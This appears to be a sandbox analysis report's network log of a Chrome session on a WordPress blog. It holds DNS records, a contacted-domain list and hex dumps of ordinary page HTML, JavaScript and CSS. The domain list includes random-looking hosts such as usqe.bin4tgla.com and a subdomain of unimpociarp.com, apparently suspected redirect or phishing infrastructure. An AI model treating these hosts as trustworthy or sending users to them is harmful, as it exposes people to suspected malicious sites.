                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900408983 CET1.1.1.1192.168.2.160xc0b8No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900408983 CET1.1.1.1192.168.2.160xc0b8No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900408983 CET1.1.1.1192.168.2.160xc0b8No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.900408983 CET1.1.1.1192.168.2.160xc0b8No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.751432896 CET1.1.1.1192.168.2.160x5e2No error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:26.751837015 CET1.1.1.1192.168.2.160xc2deNo error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.180208921 CET1.1.1.1192.168.2.160x2891No error (0)reporting.go-mpulse.netreporting.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.188227892 CET1.1.1.1192.168.2.160xf62aNo error (0)reporting.go-mpulse.netreporting.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.681349039 CET1.1.1.1192.168.2.160x83b0No error (0)www.asosglobal.comsnir.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:29.682719946 CET1.1.1.1192.168.2.160x5262No error (0)www.asosglobal.comsnir.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.164813042 CET1.1.1.1192.168.2.160x4107No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:30.165421009 CET1.1.1.1192.168.2.160xd112No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.004482031 CET1.1.1.1192.168.2.160x5de3No error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.004482031 CET1.1.1.1192.168.2.160x5de3No error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.004499912 CET1.1.1.1192.168.2.160xda6eNo error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.095272064 CET1.1.1.1192.168.2.160x9ba4No error (0)a19065870423.cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096103907 CET1.1.1.1192.168.2.160x6613No error (0)a19065870423.cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096103907 CET1.1.1.1192.168.2.160x6613No error (0)a19065870423.cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.888458014 CET1.1.1.1192.168.2.160xd908No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.888458014 CET1.1.1.1192.168.2.160xd908No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.888916016 CET1.1.1.1192.168.2.160xf9eeNo error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.074285030 CET1.1.1.1192.168.2.160x5607No error (0)logx.optimizely.com34.49.241.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.724299908 CET1.1.1.1192.168.2.160x2ef4No error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823297024 CET1.1.1.1192.168.2.160x1fd3No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823311090 CET1.1.1.1192.168.2.160xe1aNo error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823311090 CET1.1.1.1192.168.2.160xe1aNo error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  • dartergary.wordpress.com
                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                    • s0.wp.com
                                                                                                                                                                                                                                                                    • s1.wp.com
                                                                                                                                                                                                                                                                    • s2.wp.com
                                                                                                                                                                                                                                                                    • 0.gravatar.com
                                                                                                                                                                                                                                                                    • fqr44.wordpress.com
                                                                                                                                                                                                                                                                    • stats.wp.com
                                                                                                                                                                                                                                                                    • fonts.wp.com
                                                                                                                                                                                                                                                                    • pixel.wp.com
                                                                                                                                                                                                                                                                    • usqe.bin4tgla.com
                                                                                                                                                                                                                                                                    • code.jquery.com
                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                    • hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com
                                                                                                                                                                                                                                                                    • dpm.demdex.net
                                                                                                                                                                                                                                                                    • asos.demdex.net
                                                                                                                                                                                                                                                                    • metrics.asos.com
                                                                                                                                                                                                                                                                    • cdn.optimizely.com
                                                                                                                                                                                                                                                                    • a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                    • static.cloudflareinsights.com
                                                                                                                                                                                                                                                                    • logx.optimizely.com
                                                                                                                                                                                                                                                                  • fs.microsoft.com
                                                                                                                                                                                                                                                                  • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                  • a.nel.cloudflare.com
                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.1649701192.0.78.124437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:40 UTC667OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dartergary.wordpress.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC461INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:41 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  X-hacker: Want root? Visit join.a8c.com/hacker and mention this header.
                                                                                                                                                                                                                                                                  Host-Header: WordPress.com
                                                                                                                                                                                                                                                                  Vary: accept, content-type, cookie
                                                                                                                                                                                                                                                                  Link: <https://wp.me/g8Jvj>; rel=shortlink
                                                                                                                                                                                                                                                                  X-ac: 5.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC908INData Raw: 33 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 69 74 65 20 54 69 74 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66
                                                                                                                                                                                                                                                                  Data Ascii: 3cc<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Site Title</title><link rel='dns-prefetch' href
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 2f 2a 20 5d 5d 3e 20 2a 2f 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 0d 0a 31 61 62 35 0d 0a 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 30 2e 77 70 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 6d 75 2d 70 6c 75 67 69 6e 73 5c 2f 77 70 63 6f 6d 2d 73 6d 69 6c 65 79 73 5c 2f 74 77 65 6d 6f 6a 69 5c 2f 32 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 30 2e 77 70 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 6d 75 2d 70 6c 75 67 69 6e 73 5c 2f 77 70 63 6f 6d 2d 73 6d 69 6c
                                                                                                                                                                                                                                                                  Data Ascii: ;}}}/* ... */</script><script>window._wpemojiSett1ab5ings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smil
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65
                                                                                                                                                                                                                                                                  Data Ascii: f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getConte
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67
                                                                                                                                                                                                                                                                  Data Ascii: catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everything
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 69 6e 6b 2d 63 6f 6c 6f 72 29 29 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 70 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 6c 72 22 5d 2c 70 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                                                                                                                                                                                                                                  Data Ascii: ink-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-image-inline-css'>.wp-block-image a{display:inline-block}.wp-block-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 61 67 65 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 3a 2e 35 65 6d 20 30 20 2e 35 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2e 69 73 2d 73 74 79 6c 65 2d 63 69 72 63 6c 65 2d 6d 61 73 6b 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 7d 40 73 75 70 70 6f 72 74 73
                                                                                                                                                                                                                                                                  Data Ascii: age .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 6e 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6f 70 61 63 69 74 79 3a 30 3b 70 61 64 64 69 6e 67 3a 30 0d 0a 38 30 30 30 0d 0a 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 36 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 31 36 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 3b 77 69 64 74 68 3a 32 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 3a 33 70 78 20 61 75 74 6f 20 23 35 61 35 61 35 61 34 30
                                                                                                                                                                                                                                                                  Data Ascii: n;display:flex;height:20px;justify-content:center;opacity:0;padding:08000;position:absolute;right:16px;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 6c 65 66 74 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 77 70 2d 2d 6c 69 67 68 74 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 74 68 29 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                                                                                                                                                                  Data Ascii: 0%;transform:translate(-50%,-50%);transform-origin:top left;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 62 6f 78 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 69 6d 67 7b 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 61 63 74 69 76 65 20 2e 73 63 72 69 6d 7b 61 6e 69 6d 61 74 69 6f 6e 3a 74 75 72 6e 2d 6f 6e 2d 76 69 73 69 62 69 6c 69 74 79 20 2e 34 73 20 66 6f 72 77 61 72 64 73 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 73 68 6f 77 2d 63 6c 6f 73 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 74 28 2e 61 63 74 69 76 65 29 7b 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 70 2d 6c 69 67 68 74 62 6f 78 2d 6f 76 65 72 6c 61 79 2e 7a 6f 6f 6d 2e 73 68 6f 77 2d 63 6c 6f 73 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6e 6f 74 28 2e 61 63 74
                                                                                                                                                                                                                                                                  Data Ascii: box-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.act
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 2d 69 6e 69 74 69 61 6c 2d 74 6f 70 2d 70 6f 73 69 74 69 6f 6e 29 29 29 20 73 63 61 6c 65 28 76 61 72 28 2d 2d 77 70 2d 2d 6c 69 67 68 74 62 6f 78 2d 73 63 61 6c 65 29 29 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31
                                                                                                                                                                                                                                                                  Data Ascii: -initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}</style><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.1649704192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC657OUTGET /wp-content/blog-plugins/marketing-bar/css/marketing-bar.css?m=1729529312i&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:41 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css
                                                                                                                                                                                                                                                                  Content-Length: 7779
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/9611-1729529319687.3264
                                                                                                                                                                                                                                                                  Expires: Tue, 21 Oct 2025 20:36:37 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC903INData Raw: 62 6f 64 79 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 3a 34 39 70 78 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d 62 6f 64 79 2e 61 64 6d 69 6e 2d 62 61 72 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67
                                                                                                                                                                                                                                                                  Data Ascii: body.has-marketing-bar{position:inherit!important;top:auto!important;--wp-admin--marketing-bar--height:49px;--wp-admin--admin-bar--height:var(--wp-admin--marketing-bar--height);margin-top:var(--wp-admin--marketing-bar--height)}body.admin-bar.has-marketing
